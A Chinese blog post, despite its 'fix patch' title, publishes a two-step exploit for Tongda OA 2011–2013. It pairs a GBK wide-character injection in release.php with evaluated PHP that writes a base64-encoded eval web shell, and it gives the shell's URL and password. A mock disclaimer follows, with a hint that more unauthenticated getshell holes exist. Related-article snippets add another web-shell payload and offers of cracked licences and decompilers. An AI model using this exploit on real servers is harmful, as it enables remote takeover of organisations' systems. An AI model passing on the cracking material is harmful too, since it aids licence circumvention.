通达oa 2013 php解密,通达OA 2011-2013 通杀GETSHELL修复补丁

最新推荐文章于 2023-02-15 21:45:00 发布
最新推荐文章于 2023-02-15 21:45:00 发布
阅读量321 收藏
点赞数
文章标签: 通达oa 2013 php解密

此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.

EXP:

第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}

第二步: [GET]http://site/general/email/index.php

SHELL: http://site/general/email/shell.php 密码C

此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好

有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~

免跨省声明:

1. 以上所有言语非本人所写 也非本人所想 如果用于非法更与本人无关!

2. 以上所有工具非本人所写 也非本人所想 如果用于非法更与本人无关!

3. 本人由于被不明外星物种控制所以被迫"发表以上内容" 其内容并非本人本意!!

爱生活的马克君
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全漏洞分析小结
qq_44005305的博客
02-13 521
安装教程为傻瓜式一键安装,这里不细说。默认账号密码admin/(空)【一>所有资源获取
通达OA 0day RCE漏洞复现
AzVoidSUN的博客
08-23 745
本次测试使用的是通达 OA V11.6版本。 给出下载地址,http://www.kxdw.com/soft/23114.html 下载好后,直接安装就可以。 然后打开登录界面。 登录 文件有默认密码 用某大佬写的EXP import requests target="http://192.168.0.110/" payload="<?php eval($_POST['agan']);?>" print("[*]Warning,This exploit code will DELETE
mysql漏洞如何打补丁_通达OA-感染勒索病毒漏洞分析
weixin_39771775的博客
11-14 434
No.1声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。No.2引言开篇的首先感谢l1nk3r大佬的帮助。前天看到通达OA官方发...
通达OA 2011-2013 通杀GETSHELL
weixin_34185320的博客
04-24 403
转载自T00ls 此程序应用于非常多的政府机构, 教育机构, 以及各大一流公司(中国电信等)! 请各位看完本文后不要试图对任何使用本程序的网站进行破坏******等… 本人发此贴纯属技术交流探讨, 并无怂恿别人去尝试***的意思! 若不接受以上条件的请自觉关闭, 由此产生的后果与作者(本人)无关! EXP: 第一步: http://ip/general...
通达OA系统11.2漏洞
qq_50854662的博客
12-02 4777
通达OA系统11.2版本为案例的Web渗透
通达OA2013增强版全部源码
06-19
通达OA2013增强版的全部源码被反编译,意味着我们可以看到原本被编译成机器语言的代码以人类可读的形式呈现,这对于学习其内部工作原理、查找和修复bug、或是扩展新功能来说,提供了极大的便利。 通达OA的核心功能...
通达OA 2013 无限制修正破解补丁(2012.11.21)
11-21
(产生原因:inc\utility_html.php文件里if($TD_MYOA_COMPANY_NAME == _( "通达信科" )),而inc\td_core.php文件里实际给出的是$TD_MYOA_COMPANY_NAME = _( "通达科技" );) 整合Office_IM 1500授权版本 修正pda、...
通达OA2013集团版破解补丁
08-17
通达OA2013集团版破解补丁,100%破解,与正版一样,我花高价买的。
uc.rar_PHP 解密_通达OA
09-24
在这个“uc.rar”压缩包中,我们主要关注的是“uc.php”,这是一个与PHP相关的解密文件,很可能涉及到通达OA系统的API接口实现。 PHP是一种广泛应用的开源脚本语言,尤其在Web开发领域占据着重要地位。解密PHP文件...
通达2013原版+破解版+OA精灵+IM1000用户补丁01
03-26
绝对能用的通达OA2013版原版+破解版+OA精灵+IM1000用户补丁。 这是从麦枫和富阳上搜集的资料,汇总整合的。 现在好多破解版都不提供原版,以至于根本就不能用。本人经反复测试。这个绝对能用。 经过破解后,通达...
通达OA2010+3.6.110712 纯净版 非骗子S发布的
10-15
通达OA2010+3.6.110712 纯净版
通达 oa 2010 php 源代码 解密
11-03
通达OA2010版本,完整general目录下php文件无加密,示例: <?php /*********************/ /* */ /* Version : 5.1.0 */ /* Author : RM */ /* Comment : 071223 */ /* */ /*********************/ include_once( "inc/auth.php" ); if ( $LOGIN_THEME != "10" ) { $query = "SELECT * from INTERFACE"; $cursor = exequery( $connection, $query ); if ( $ROW = mysql_fetch_array( $cursor ) ) { $IE_TITLE = $ROW['IE_TITLE']; } echo "<html>\r\n<head>\r\n<title>"; echo $IE_TITLE; echo "</title>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\">\r\n[removed][removed]\r\n[removed]\r\nself.moveTo(0,0);\r\nself.resizeTo(screen.availWidth,screen.availHeight);\r\nself.focus();\r\n\r\nrelogin=0;\r\nfunction exit()\r\n{\r\n if(document.body.clientWidth-event.clientX<50||event.altKey||event.ctrlKey)\r\n {\r\n"; if ( $ISPIRIT == 1 ) { echo "return;"; } echo " var req = new_req();\r\n\treq.open(\"GET\", \"relogin.php\", true);\r\n\treq.send('');\r\n }\r\n}\r\n\r\n[removed]\r\n</head>\r\n"; include_once( "inc/antivirus.txt" ); echo "<frameset rows=\"50,*,20\" cols=\"*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame1\" <frame name=\"banner\" id=\"banner\" scrolling=\"no\" noresize=\"noresize\" src=\"topbar.php\" frameborder=\"0\">\r\n <frameset rows=\"*\" cols=\"200,*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame2\">\r\n <frame name=\"leftmenu\" id=\"leftmenu\" scrolling=\"no\" noresize=\"noresize\" src=\"ipanel\" frameborder=\"0\">\r\n <frame name=\"table_index\" id=\"table_index\" scrolling=\"no\" src=\"table.php\" frameborder=\"0\">\r\n </frameset>\r\n <frame name=\"status_bar\" id=\"status_bar\" scrolling=\"no\" noresize=\"noresize\" src=\"status_bar\" frameborder=\"0\">\r\n</frameset>\r\n</html>\r\n"; exit( ); } include_once( "inc/utility_all.php" ); include_once( "inc/td_core.php" ); include_once( "inc/chinese_date.php" ); include_once( "inc/sys_function_all.php" ); ob_end_clean( ); 本资源(仅供技术学习,版权归原公司所有)
批量PHP解密工具
06-30
本工具来自于网络传播,本店不为其担保可用性; 本软件将支持批量对zend5系列的解密操作 但因反翻译源码一定程度可能会造成源码出现一些错误等,请谨慎与源文件替换,自行手动修复错误等问题!!
通达OA 2013 破解工具(6.4 130108)集团专业版
01-18
通达OA2013版的解锁工具,蝴蝶的作品,原版是收费的,已被本人破解,免费提供给有需要的朋友学习交流用,可能不支持2003和XP系统。测试的朋友,可以在WIN7环境下安装,解密后移到服务器上使用。这个是集团专业版,之前上传了个集团旗舰版的,有需要的自已过滤下!
超强php程序的反编译工具
12-01
Windows7及vista系统可用,但需要去掉UAC,或者用管理员权限运行主程序。 如无意外,黑刀Dezender 5.0 三套解密内核版 将会是最终版本,除非新的解密内核出现,否则今后也将不再更新,也请勿再加本人QQ咨询任何关于Zend解密的问题!感谢各位黑刀爱好者关注,敬请期待本人其他作品。谢谢! 反馈问题情况汇总: 1、有很多朋友说下载了最新版还是解不出来,是因为他们把程序放在了桌面上或者Program Files目录下。大家一定要记得,不要把黑刀Dezender的主程序以及需要解密PHP文件放置在目录名包含空格的目录内,比如桌面、Program Files目录等,除了目录名不能包含空格以外,也不能包含英文的句号,以免程序将目录当做文件来处理,造成无法解密的情况。还有一种可能性,是因为被加密了的PHP文件采用了最新版的Zend来进行的加密,所以黑刀Dezender解不出来。 2、解密出来的文件有“乱码”:这种情况通常是因为PHP程序在加密时采用了混淆函数,而所使用的函数又是Dezender无法识别的,所以在函数的部分变成了“乱码”。目前唯一的解决办法只能是更新自己的混淆函数库来尝试解密,别无他法。 3、网友“李向阳”问:“我解开的文件能读,但是有很多很基本的语法问题。不知道是怎么回事!” 对于这个典型问题,我只能回答说,解密出来的文件不可能百分百还原为原始未加密的文件的。在遇到需要手工去修复代码的情况时,就要求Dezender的使用者具备相应的PHP程序编写知识。如果不具备?自己找书找资料看。呵呵。 4、如果出现如下的错误提示:“无法判断程序输入点于动态链接库php5ts.dll上”说明dezender和原有的PHP环境冲突,可考虑卸载原有PHP环境,或安装虚拟机,在虚拟机上使用dezender。实在不行,换台电脑试试看吧。呵呵。虚拟机的下载地址:http://tmd.me/2008/read.php?5 重要声明:   黑刀Dezender本身只是个集成工具而已,主程序实际上只是用Delphi开发的GUI界面的外壳程序,核心的解密功能部分来自互联网上的收集整理,我所做的外壳编程,仅是在原有的各个解密内核版本Dezender的功能上,开发基于windows的用户界面,以便于使用者对原有类似“DOS”环境下的各种应用功能的Windows实现。   关于加密保护自己的PHP程序的问题:   类似微盾加密的、可以混淆函数和变量的加密方式,官方名字叫做“PHPlockit”,微盾的php加密专家也有类似的功能,但似乎会造成程序无法正确运行。目前在我没有开发新版的解密工具之前,据我所知除我之外能手工解密“类微盾加密混淆函数及变量”的人并不多,大家可以试试。其他比较安全的加密方式比如Ioncube等也可以使用,只是国内支持该加密方式的虚拟主机不多,如果是独立服务器,可以考虑采用。   而Zend的混淆函数也是至今无法完全突破的问题,大家在开发自己的PHP程序时,可以采用较长的自定义函数名和变量名,这样Dezender就无法正确的识别出明文来了,就算解密掉程序本身,因为函数和变量都已经被混淆,自然也很难让程序正确运行了。
某知名OA高版本getshell思路(附部分脚本)
C20220511的博客
07-26 2300
本文以曾经研究过的通达OA11.9版本为例,阐述在高版本通达中如何利用通达自身的特性来getshell。文中涉及的所有漏洞都是笔者自研和首发,大多数已在最新版的通达OA12.0中修复,本文只是分享一下挖掘这些漏洞的思路和过程。很多时候我们想拿到权限,不一定非要通过某个牛逼的漏洞,组合利用一些特性也能带来意想不到的效果。...
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
bluemoon_0的博客
02-15 720
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
通达oa 2013 机器码 计算
最新发布
12-31
通达OA 2013是一款企业办公自动化软件,机器码是为了授权软件使用而产生的一个唯一标识码。计算通达OA 2013的机器码需要进行以下步骤: 1. 打开通达OA 2013软件,进入注册界面。 2. 在注册界面中,会显示一些必要信息,包括机器码和注册码。 3. 要计算机器码,需要找到软件注册界面中的“计算机器码”或类似的选项。 4. 点击“计算机器码”,系统会生成一个由字母和数字组成的一串代码。 5. 复制生成的机器码,并将其粘贴到注册码生成器或与软件供应商提供的注册码计算方法中。 6. 在注册码生成器中输入机器码之后,点击“生成注册码”或类似的按钮。 7. 注册码生成器将根据机器码生成一个唯一的注册码,该注册码用于激活通达OA 2013软件。 8. 将生成的注册码复制并粘贴到注册界面中的相应位置。 9. 点击“注册”或类似的按钮完成注册和激活过程。 10. 通达OA 2013软件将通过验证注册码的有效性来确认您的授权。 需要注意的是,以上步骤仅供参考,实际的计算机器码和注册码可能因软件版本或供应商的不同而有所差异。建议在注册过程中仔细阅读软件提供的说明或向供应商咨询以确保正确计算机器码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值